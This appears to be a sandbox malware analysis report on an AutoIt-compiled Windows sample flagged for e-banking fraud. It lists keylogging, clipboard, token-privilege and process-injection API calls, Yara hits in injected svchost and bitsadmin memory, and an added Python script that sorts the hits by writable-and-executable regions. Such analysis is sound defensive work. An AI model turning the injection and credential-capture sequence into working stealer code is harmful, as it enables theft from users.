Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

Source: Yara match | File source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
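The FormBook Yara hits above fire in memory dumps of svchost.exe (process index 3), bitsadmin.exe (7), LbtMpScwNRqrVB.exe (8) and process 6, and the dump names carry the region's page protection. The script below is an added triage example, not part of the Joe Sandbox report: it parses the .sdmp names from "Yara match" lines and keeps only hits that landed in memory that is both writable and executable, which is the shape injected, unpacked code takes, while read-write-only hits (such as the 0x03740000 and 0x03790000 regions in process 7) are set aside. The field layout of the dump name is my reading of the names on this page and is labelled as an assumption; the PAGE_* constants are the standard winnt.h values, and the sample lines are constructed from the entries above.

```python
import re
from dataclasses import dataclass

# Windows memory protection constants from winnt.h (standard values).
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Sample lines constructed from the Yara match list in the report (same dump names).
SAMPLE_LINES = """\
Source: Yara matchFile source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
"""

# Assumed layout of a Joe Sandbox memory dump name (my reading of the names on this page):
#   <proc>.<phase>.<id>.<base>.<protect>.<...>.sdmp
# Only <proc>, <base> and <protect> are decoded. <proc> is the analysis-local process
# index that also prefixes the "N_2_ADDR" function tags in the report, not an OS PID.
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class MemoryMatch:
    proc: int      # report-local process index
    base: int      # base address of the dumped region
    protect: int   # PAGE_* protection of the dumped region

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_memory_matches(text: str) -> list[MemoryMatch]:
    """Extract the in-memory Yara hits (type: MEMORY) from report lines."""
    hits = []
    for line in text.splitlines():
        if "type: MEMORY" not in line:
            continue  # unpacked-PE hits carry no region metadata in their name
        m = SDMP_RE.search(line)
        if m:
            hits.append(MemoryMatch(int(m["proc"], 16), int(m["base"], 16), int(m["protect"], 16)))
    return hits


def rwx_matches_by_process(text: str) -> dict[int, list[int]]:
    """Process index -> sorted bases of Yara-matched regions that are writable AND executable.

    A family signature firing inside RWX memory is the classic injected-code shape;
    hits in read-write-only regions (configuration, decrypted strings) are left out.
    """
    by_proc: dict[int, list[int]] = {}
    for hit in parse_memory_matches(text):
        if hit.executable and hit.writable:
            by_proc.setdefault(hit.proc, []).append(hit.base)
    return {proc: sorted(bases) for proc, bases in sorted(by_proc.items())}


if __name__ == "__main__":
    for proc, bases in rwx_matches_by_process(SAMPLE_LINES).items():
        print(f"process {proc}: RWX Yara hits at " + ", ".join(f"0x{b:08X}" for b in bases))
```

Run against the lines above it reports RWX hits for processes 3, 6, 7 and 8 and drops the two PAGE_READWRITE regions of process 7; those RWX bases are the regions to pull for unpacking, and the trailing fields of the dump name are left undecoded rather than guessed.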

                System Summary

Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00403B3A: This is a third-party compiled AutoIt script.
Source: 1SxKeB4u0c.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 1SxKeB4u0c.exe, 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_820ac97e-f
Source: 1SxKeB4u0c.exe, 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_b802033f-c
Source: 1SxKeB4u0c.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_abc5f272-f
Source: 1SxKeB4u0c.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_77f9385a-7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0044CA93 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD4340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD4650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD3090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD39B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD3D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E3090 NtSetValueKey
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_039E3D70 NtOpenThread
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03289390 NtReadFile
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03289220 NtCreateFile
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03289690 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03289520 NtClose
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: 7_2_03289480 NtDeleteFile
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0040E6A0
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0042D975
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0040FCE0
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004221C5
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004362D2
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004803DA
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0043242E
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004225FA
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0045E616
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004166E1
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0043878F
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00436844
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00480857
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00418808
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00468889
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0042CB21
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00436DB6
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00416F9E
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00413030
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0042F1D9
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00423187
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00401287
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00421484
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00415520
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00427696
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00415760
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00421978
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00439AB5
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00527CC8
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00487DDB
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00421D90
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0042BDA6
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0040DF00
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00413FE0
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00A8B968
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F500D9
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F151EE
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F16EAF
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F4C7F0
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F43780
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F4D580
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F17B71
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F539A3
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F45980
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F17F80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00438993
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00421ACB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0044F0B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004301D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004232F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00422A90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0042E3D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004303F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00436B8E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00436B93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00421C40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00421C3A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0042E51C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0042E523
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00422E49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00422E50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00422F19
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00422720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305A352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030603E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FAE3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03040274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030202C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303A118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03028158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030541A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030601AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030581CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03032000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F90100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBC6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F9C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA0770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC4750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03060591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03044420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03052446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA0535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0304E4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305AB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F9EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03056BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCE8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F868B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0306A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA2840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FAA840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA29A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB6962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03042F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03014F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB2E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301EFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA0E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FACFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305EE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F92FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305CE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC0F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FE2F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305EEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F90CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303CD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA0C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F9ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB8DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03040CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FAAD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBB2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA52A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FE739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F8D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030412ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA70C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0306B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FAB1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F8F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FD516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0304F0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305F0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030570E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305F7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FE5630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030516CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03057571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F91460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303D5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030695C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305F43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FE5AA0
